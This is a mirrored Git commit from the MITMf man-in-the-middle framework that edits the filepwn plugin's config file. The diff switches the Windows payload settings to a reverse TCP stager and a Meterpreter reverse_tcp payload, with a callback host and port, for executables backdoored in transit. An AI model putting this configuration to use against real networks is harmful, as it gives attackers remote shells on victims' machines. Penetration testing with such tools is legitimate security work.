mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-19 04:59:33 -07:00
- Fixed error in filepwn plugin config file
This commit is contained in:
parent
846f85426c
commit
5100458e70
1 changed files with 2 additions and 2 deletions
|
@ -324,11 +324,11 @@
|
||||||
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 8443
|
PORT = 8443
|
||||||
SHELL = reverse_shell_tcp
|
SHELL = reverse_tcp_stager
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
ZERO_CERT = False
|
ZERO_CERT = False
|
||||||
PATCH_DLL = True
|
PATCH_DLL = True
|
||||||
MSFPAYLOAD = windows/shell_reverse_tcp
|
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
||||||
|
|
||||||
[[[[WindowsIntelx64]]]]
|
[[[[WindowsIntelx64]]]]
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue